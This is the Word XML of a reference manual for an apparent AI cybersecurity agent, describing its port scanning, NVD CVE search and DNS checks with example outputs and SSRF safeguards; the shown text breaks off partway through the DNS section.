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2"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">AI CYBERSECURITY AGENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565c0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">WHAT THE AGENT CHECKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Reference of All Security Checks, Scans &amp; Analyses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 2.2.0  |  July 2026  |  Sasi Kumar R</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The AI Cybersecurity Agent performs 12 categories of security checks across network, vulnerability, threat intelligence, forensics, and infrastructure domains. Each check is implemented as a dedicated tool that the AI agent can invoke autonomously based on user queries, or that can be triggered directly through the API and web dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This document provides a complete reference of every check the agent performs, what it looks for, what external services it queries, what output it produces, and the severity classifications it uses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of All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0"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="23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Check</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What It Does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External API</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Trigger Command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Scanning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Scans TCP ports on target host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None (direct)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/api/scan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CVE Search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Search vulnerabilities by keyword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NIST NVD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/api/cve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CVE Details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Get full details of a specific CVE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NIST NVD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/api/cve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Lookup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Query DNS records (A, MX, NS, etc.)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servers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/api/dns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Reverse DNS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Map IP address back to hostname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servers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Via chat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Zone Security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SPF, DMARC, DKIM records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servers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/api/dns (security=true)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 Reputation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IP against threat feeds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AbuseIPDB, Shodan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/api/reputation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Domain Reputation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domain against threat feeds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VirusTotal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/api/reputation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Log Analysis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Detect attack patterns in logs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None (local)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/api/logs/analyze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File Hash Check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hash against malware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VirusTotal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/api/hash/check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WHOIS Lookup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Domain/IP ownership details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RDAP/WHOIS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/api/whois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 Geolocation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Physical location of an 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ip-api.com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/api/geolocate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. PORT SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What It Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The port scanner probes a target host's TCP ports to identify which services are running and potentially exposed to the network. This is the most fundamental reconnaissance check in cybersecurity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ports Scanned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In "common" mode (default), the agent scans 25 well-known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Port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Service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Port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Service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Port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Service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FTP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Telnet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SMTP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HTTP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POP3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MSRPC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NetBIOS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IMAP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HTTPS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SMB</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993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IMAPS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995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POP3S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1433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MSSQL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1521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Oracle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3306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MySQL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3389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RDP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5432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PostgreSQL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5900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VNC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6379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Redis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8080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HTTP Proxy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8443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HTTPS-Alt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27017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MongoDB</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Elasticsearch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
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom range mode allows specifying any range (e.g., "1-1024" or "8000-9000").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF protection: blocks scanning of loopback (127.x.x.x), link-local (169.254.x.x), multicast (224.x.x.x), and reserved ranges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Concurrent scanning with 2-second timeout per port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-admin sessions use TCP connect scan; admin sessions can use SYN scan via Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Example Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">## Port Scan Results for 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 22  (SSH)      - OPEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 80  (HTTP)     - OPEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 443 (HTTPS)    - OPEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 3306 (MySQL)   - OPEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open ports: 4 | Closed: 21 | Total scanned: 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 What It Means</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open ports indicate running services. Unnecessary open ports are attack surface. For example: port 3306 (MySQL) exposed to the network could allow database attacks if not properly firewalled. Port 3389 (RDP) open on a public-facing server is a common brute-force target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. CVE VULNERABILITY SEARCH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 What It Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Searches the NIST National Vulnerability Database (NVD) for known security vulnerabilities. Supports two modes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keyword search: finds CVEs matching a product, technology, or description (e.g., "apache log4j", "windows smb", "openssl")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE ID lookup: retrieves full details for a specific CVE (e.g., CVE-2024-1234)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information Retrieved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE ID and publication date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS severity score (0.0–10.0) and severity rating (LOW / MEDIUM / HIGH / CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability description and affected products (CPE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack vector, complexity, privileges required, user interaction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact on confidentiality, integrity, and availability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">References and patch links</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 External API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST NVD REST API v2.0 (https://services.nvd.nist.gov/rest/json/cves/2.0). No API key required. Rate-limited to 5 requests per 30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Example Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">## CVE Search: "log4j"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-44228 | CVSS: 10.0 (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Log4j2 JNDI features do not protect against</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker-controlled LDAP and other JNDI endpoints...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector: NETWORK | Complexity: LOW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Privileges: NONE | User Interaction: NONE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. DNS RECONNAISSANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 What It Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Performs comprehensive DNS analysis across three sub-tools:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1 DNS Lookup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries multiple DNS record types for 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Record</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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What It Reveals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
